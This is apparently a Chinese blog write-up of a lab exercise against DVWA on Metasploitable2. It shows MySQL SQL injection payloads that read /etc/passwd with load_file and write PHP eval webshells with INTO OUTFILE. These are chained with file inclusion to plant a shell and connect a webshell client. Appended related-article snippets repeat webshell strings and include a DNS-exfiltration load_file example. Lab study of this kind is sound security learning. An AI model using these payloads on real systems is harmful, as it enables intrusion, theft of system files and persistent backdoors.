SQL注入一句话木马(load_file/out file)

最新推荐文章于 2024-04-12 02:53:44 发布
最新推荐文章于 2024-04-12 02:53:44 发布
阅读量8.6k 收藏 35
点赞数 4
文章标签: SQL注入 SQL注入一句话木马 load_file out file
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42342141/article/details/103253124
版权

工具

靶机——metasploitable2
环境——DVWA,(low等级下)
菜刀——蚁剑

权限查看

查看mysql是否有对函数load_file(),outfile()函数的限制
(securefilepriv的值是否为NULL)

show global variables like '%secure%';
NULL 表示不可用, 空 表示可用

在这里插入图片描述

' order by 2--   查看字段数
' union all select database(),user()--   查看当前数据库和用户

查看当前用户是否有文件读写的权限:
1' and (select File_priv from mysql.user where user='root' and host='localhost')='Y'-- 
1' and (select File_priv from mysql.user where user='root' and host='%')='Y'-- 
//注: 我在metasploitable2 的数据库里查了 root@ 后面接的的是 % ,
但是从浏览器上查的是localhost 具体原因我也不清楚
如果遇到的话,就两个都试一遍。

不清楚如何手工注入的可以点击下面的链接看看!
SQL注入原理一
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现当前用户拥有对文件读写的权限

load_file / into out file

load_file()
条件:

  • 知道文件的绝对路径
  • 能使用union
  • 对web目录有读权限

如果有过滤单引号,则可以将函数中的路径进行hex或者char编码

1' union select load_file('/etc/passwd'),2-- 
如果有过滤  '  :
1' union select load_file(\'/etc/passwd\'),2-- 
也可以16进制编码,或者转成 ASCII码 
编码解决!16进制(用编码即不用单引号)

在这里插入图片描述
into outfile()
条件:

  • 要有file_priv权限
  • 知道网站的绝对路径
  • 对web有写的权限
  • 没有过滤单引号
写入部分有单引号记得 转译 \
' union select  '<?php @eval($_POST[\'hack\'])?>',2 into outfile '/tmp/shell.php'-- 
' union select  '<?php @eval($_POST[\'hack\'])?>',2 into outfile '/tmp/shell.txt'-- 
(明明有读写的权限,但是无法写入 /var/www/ 这个目录下,
 可以写入 /tmp/ ,但是这样就连不上菜刀了,弄了一晚上没弄明白……
然后就是不加路径,直接传,可以传,但不知道传哪去了,这就尴尬)
' union select  '<?php eval($_POST[\'hack\'])?>',2 into outfile '/var/www/dvwa/shell.php'-- 
' union select '<?php eval($_POST[\'hack\'])?>',2 into outfile 'shell.php'#
' union select  '<?php eval($_POST[\'hack\'])?>',2 into outfile '/var/www/dvwa/vulnerabilities/sqli/shell.php'-- 
(3个都不行)
存在过滤的时候:
如果写入的信息带有单引号 ,可以hex 编码,或者转成 ASCII码

尝试写入 /tmp 目录下,虽然会报这个警告,但是文件是已经写入进去了!
由于网页只对 /var/www/ 目录下有读取权限,所以无法使用菜刀连接了!
在这里插入图片描述
在这里插入图片描述
但是在DVWA里有文件包含漏洞,所以可以本地包含一个文件

构造木马: /tmp/shell.txt
' union select  '<?fputs(fopen("shell01.php","w"),\'<?php @eval($_POST[caidao]);?>\')?>',2 into outfile '/tmp/shell.txt'-- 
这串代码的意思是:
将 <?fputs(fopen("shell01.php","w"),\'<?php @eval($_POST[caidao]);?>\')?> 写入 /tmp/shell.txt 
然后通过 文件包含 运行 shell.txt 里的 php 代码,
而 <?fputs(fopen("shell01.php","w"),\'<?php @eval($_POST[caidao]);?>\')?> 这串代码的意思是:
在文件包含那个目录( /var/www/dvwa//vulnerabilities/fi)创建 shell01.php 文件,
并写入 <?php @eval($_POST[caidao]);?> 这串代码

菜刀连接的链接:http://192.168.47.133/dvwa/vulnerabilities/fi/shell01.php

可以参考-文件包含漏洞
第一步: 将代码写入 /tmp/shell.txt
在这里插入图片描述
发现成功写入!
在这里插入图片描述
第二步: 远程包含 /tmp/shell.txt
发现成功执行!
在这里插入图片描述
在这里插入图片描述
第三步: 使用菜刀连接
在这里插入图片描述
在这里插入图片描述
至此手工 SQL注入木马 就结束了!
另外:如果有哪位同学也遇到了上面有权限但无法写入 /var/www的情况,如果知道原因还请告解!谢谢!

初学者L_言
关注
  • 4
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入--Load_file与into outfile
weixin_44940180的博客
08-09 2880
Load_file与into outfile 利用into outfile拿到getshall
Mysql注入中的outfile、dumpfileload_file函数详解
09-09
在这个话题中,我们将深入探讨三个与文件操作相关的MySQL函数:`INTO OUTFILE`、`INTO DUMPFILE`和`LOAD_FILE()`,它们在SQL注入攻击中扮演着重要角色。 1. `INTO OUTFILE`: 这个函数用于将查询结果直接导出到一...
Sql注入文件读写操作
INK
05-05 988
sql文件读写
SQL注入篇——一句话木马
爱国小白帽
01-08 6343
一、利用sql注入上传一句话木马 成功 验证 二、利用dns报错回显查看数据 三、利用dns报错回显数据 返回数据库名的注入语句 1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.txt")) – - ...
sql注入之into outfile语句写入一句话木马_sql的into outfile(1)
最新发布
2301_77033340的博客
04-12 504
1、漏洞介绍into outfile 语句用于把表数据导出到一个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。mysql 新版本下secure_file_priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出;
一句话木马SQL注入
人若有志,就不会在半坡停止。
08-25 2799
sql注入
sql注入一句话木马
告白的博客
07-09 3229
0x00 sql注入一句话木马 首先介绍一下一句话木马一句话木马是一种基于 B/S结构的简短脚本,通过这个脚本,执行POST来的任意参数语句,可以提交任意内容,黑客借此进行SQL注入或拿到SHELL写入大马或截取网站私密信息,达到注入非法信息等的目的。 常见脚本的一句话木马: php的一句话木马: <?php @eval($_POST['pass']);?> asp的一句话是: <%eval request (“pass”)%> aspx的一句话是: <%@ Page
MySQL使用LOAD_FILE()函数方法总结
09-09
MySQL数据库系统中,LOAD_FILE()函数是一个非常实用的功能,它允许用户直接从服务器的文件系统中读取文件内容,并将其作为一个字符串返回。这个函数在处理大量文本数据或者需要快速导入文件内容到数据库中时非常...
sql_out.gz_out_sql export
09-23
标题“sql_out.gz_out_sql export”暗示了这是一个关于SQL数据导出的过程,其中可能涉及到数据库备份、数据迁移或分析需求。描述中提到“通过shell脚本导出数据库中指定表中的数据”,这提示我们该过程是自动化进行...
php注入一句话,总结的php注入语句
weixin_42629522的博客
03-26 592
2008年02月24日 星期日 22:291.判断是否存在注入,加';and 1=1;and 1=22.判断版本 and ord(mid(version(),1,1))>51 代替。5.判断数据库连接帐号有没有写权限,and (select count(*) frommysql.user)>0select1,concat(char(124,13,10),SCHEMA_NAME,char...
SQL注入上传一句话木马(转)
hanzhen668的博客
06-10 1435
SQL注入上传一句话木马
SQL注入16】SQL漏洞利用之读写文件
Fighting_hawk的博客
02-22 4328
1. 对文件进行读写既收到文件系统对用户权限的制约、也收到数据库设置的制约。 2. 掌握利用SQL漏洞进行文件读写的方法。 3. 后续需要进一步了解如何获取网站根目录路径的方法。
浅谈MySQL导出一句话木马拿WebShell的方法-只需要一句SQL
gscaiyucheng的专栏
02-28 9962
昨天看一篇文章中说到MySQL导出一句话木马拿WebShell的方法。   文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):   Drop TABLE IF EXISTS temp; //如果存在temp就删掉   Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段   Insert INT
mysql写入一句话木马
Websec
07-16 1万+
前提: root权限,知道了服务器的web的绝对路径,尝试写入一句话 mysql查询语句执行:select "&lt;?php @eval($_POST['pass']);?&gt;" INTO OUTFILE "D:\Wamp\2.php" 注意事项: 1、绝对路径的猜解 2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.ph...
MySQL注入之木马上传拿webshell
Jim的博客
08-15 1万+
原理:利用MySQL中的写命令into outfile(固定式:select A into outfile B),在目标Web虚拟路径D:/WWW/下面生成一个木马文件  工具:中国菜刀 1.首先查找SQL注入点 使用单引号'报错,使用and 1=1页面正常和and 1=2页面不正常,来判断存在SQL注入 2.使用order by猜测字段数量 ?id=1+order+by+2--+
明小子注入工具+啊D注入工具+御剑后台扫描工具+中国菜刀一句话木马
热门推荐
Jim的博客
08-16 9万+
御剑: 御剑主要用来扫描目标站点的敏感目录,如后台管理页面,cms类型以及版本等 使用: 1.输入目标站点的url,点击扫描 2.扫描结果分析: HTTP响应值为200,代表页面可以访问 双击链接http://../index.asp,进入目标站点主页 双击链接http://../admin/login.asp, 进入后台管理页面 双击链接http://../FCKeditor/_
SQL注入写入一句话php(outfile方式)&中国菜刀连接
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-13 3622
通过SQL注入漏洞上传一句话木马前言一、先读取数据库路径二、写入一句话木马1.关闭windows系统防护三、上菜刀 前言 具体sql注入漏洞和一句话木马原理以及sql语句这里不做讲解,直接开门见山 以dvwa的low级别为例 一、先读取数据库路径 1' union select @@datadir,2# 二、写入一句话木马 1' union select 1,"<?php eval($_POST[wang]);?>" into outfile 'C:/phpStudy/PHPTutorial
MySQLload_file的问题
huxyc的博客
03-21 7598
问题:怎么都无法导入文件!!! show global variable like '%secure%'; --查看有权限的文件夹 --一般是C:/ProgramData/MySQL/MySQL Server 8.0/Uploads -- ' ' 就是引号 ##注意MySQL中的文件夹识别符是 / 我猜测可能是用户权限的问题,有可能是配置问题。于是我百度了一下,然后我试着查看配置。 把文...
select\.*load_file这个SQL注入举一个例子
09-25
### 回答1: 假设有一个表单,用户可以输入自己的用户名和密码,然后提交给后端进行验证。后端的 SQL 查询语句可能是这样的: ``` SELECT * FROM users WHERE username='输入的用户名' AND password='输入的密码'; ``` 如果攻击者在用户名的输入框中输入以下内容: ``` ' or 1=1;# ``` 那么 SQL 查询语句就会变成这样: ``` SELECT * FROM users WHERE username='' or 1=1;#' AND password='输入的密码'; ``` 这个 SQL 查询语句的意思是选择所有用户或者 1=1(因为 1=1 总是成立),然后以 "#" 注释掉后面的语句。这样攻击者就可以绕过用户名和密码的验证,成功登录系统。 如果攻击者在密码的输入框中输入以下内容: ``` '; SELECT LOAD_FILE("/etc/passwd");# ``` 那么 SQL 查询语句就会变成这样: ``` SELECT * FROM users WHERE username='输入的用户名' AND password=''; SELECT LOAD_FILE("/etc/passwd");#'; ``` 这个 SQL 查询语句的意思是选择用户名为输入的用户名,并且密码为空或执行 `LOAD_FILE("/etc/passwd")` 命令(读取系统的 /etc/passwd 文件)。这样攻击者就可以获取系统的敏感信息,如用户名、UID、GID 等等。 因此,使用 `select\.*load_file` 这种 SQL 注入攻击可以破坏应用的安全性,可能导致数据泄露、系统崩溃等问题。开发者需要谨慎处理用户输入,对于所有的输入都要进行验证和过滤,确保输入不会被用于构造恶意的 SQL 语句。 ### 回答2: SQL注入是一种常见的web安全漏洞,攻击者通过注入恶意的SQL代码来窃取、修改、删除或者破坏数据库中的数据。在这个问题中,我们以select\.*load_file这个SQL注入为例来说明。 load_fileMySQL数据库内置函数,用于读取指定文件的内容。当我们在一个web应用程序中构造一个查询时,如果未正确处理用户输入的数据,可能会导致SQL注入漏洞的发生。 假设我们有一个简单的web应用程序,其中包含一个搜索功能,用户可以输入关键词来搜索相关的文件。后台代码可能是这样的: ```python query = "SELECT * FROM files WHERE name = '" + user_input + "'" result = sql_query(query) ``` 在正常使用情况下,用户输入的关键词会被放在查询语句中的一对引号之间。然而,如果用户恶意构造输入字符串,就可以绕过这种限制,执行恶意的SQL代码。 举个例子,假设用户在搜索框中输入`'; SELECT * FROM users -- `。构造出的查询语句如下: ```sql SELECT * FROM files WHERE name = ''; SELECT * FROM users -- ' ``` 这个查询语句的含义是先查询`files`表中`name`列等于空字符串的记录,然后再查询`users`表中的所有记录。 如果这个恶意构造的输入字符串被直接拼接到查询语句中,并且没有进行合适的处理和过滤,那么攻击者实际上就可以读取、修改或者破坏`users`表中的数据,可能导致安全问题。 为了防止SQL注入漏洞,开发者需要使用参数化查询或者预编译的SQL语句,以确保用户输入的数据被正确地转义和过滤,从而防止恶意注入代码的执行。这样可以保护数据库的安全性,避免潜在的攻击。 ### 回答3: select\.*load_file是一种常见的SQL注入技术,用于读取服务器上的文件内容。以下是一个简单的例子来说明它的用法: 假设一个网站存在一个弱点,允许用户通过输入数字获取对应的文章内容。这个网站使用了以下SQL查询来检索文章: ``` SELECT content FROM articles WHERE id = '输入的数字'; ``` 攻击者可以利用这个弱点来执行select\.*load_file注入。假设服务器上有一个`passwords.txt`文件,里面存储了用户的密码。 攻击者可以通过输入以下内容: ``` 1 UNION ALL SELECT select\.*load_file('path/to/passwords.txt'); ``` 通过这个注入,SQL查询将变成: ``` SELECT content FROM articles WHERE id = '1 UNION ALL SELECT select\.*load_file('path/to/passwords.txt')'; ``` 这个查询将执行两个部分的结果合并,第一个部分是选择文章内容,第二个部分是读取服务器上的`passwords.txt`文件。 结果是,攻击者将成功读取`passwords.txt`文件的内容,并且可以进一步滥用这些信息进行其他攻击行为。 这个例子展示了select\.*load_file作为SQL注入的一个应用场景。重要的是要意识到这种漏洞的存在,并采取相应的安全措施来防止攻击的发生,比如正确过滤和验证用户输入。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值